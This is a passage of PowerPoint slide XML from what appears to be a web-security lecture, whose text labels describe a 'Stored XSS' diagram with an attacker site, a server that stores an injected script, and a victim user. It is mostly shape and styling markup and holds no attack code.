                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="551433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2863215" cy="2132330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2147570" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="718185" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1060"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBFE194F-71F2-074C-B049-C3036A442EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D3736A-41C1-7745-B87D-0BDE202729D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
